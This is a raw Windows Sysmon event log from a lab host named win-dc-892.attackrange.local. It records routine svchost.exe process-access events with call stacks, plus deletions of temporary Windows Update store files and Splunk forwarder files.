12:03:46.511{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.277{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2eb40.TMPMD5=454CB557E018AE1392603B8CE43044D4,SHA256=12954C6F022AEC3AF4773BD53C76D03BF38C7F3789FE67561715CDF757F2C838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.230{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D75319EE00D9F5EA7BC5CCB6DE952E6,SHA256=B2AA6F08F2E9952F4AB76BF69046884F724574558A74585EAF8F5ADCF728B3D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.215{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2eb02.TMPMD5=D529AA2088A8961F814C32A2EDBCF52F,SHA256=03D19DA60915CB805D761B0DD7B811EE0423656F53242D6B03D6F29A71C52980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.168{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B3B252A4E8C14092EB02E7E6D4B797,SHA256=939DC15EEF0DD1E9FE1C52B4CA32CFB9A75CF99EA32CF4A0A4DD3DFAA400BBBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.152{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2eac3.TMPMD5=C2907C7C1C65DEE0AE964F942A027D55,SHA256=383DD56C106F4754A41AD09067AFF9E42EF2962F15366D0D14827C10D2E899B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.105{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.105{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.105{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000008923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.074{266CAFBE-646C-6064-1000-00000000AE01}1124NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2ea75.TMPMD5=FBCB1DF6FFB9E2ED1FB688AE88CDA060,SHA256=3D5901DF537C74DA245F92C38E8C6E5CF095CA32ACD9289D1AE0B835F4FC1726,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.059{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.059{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.027{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
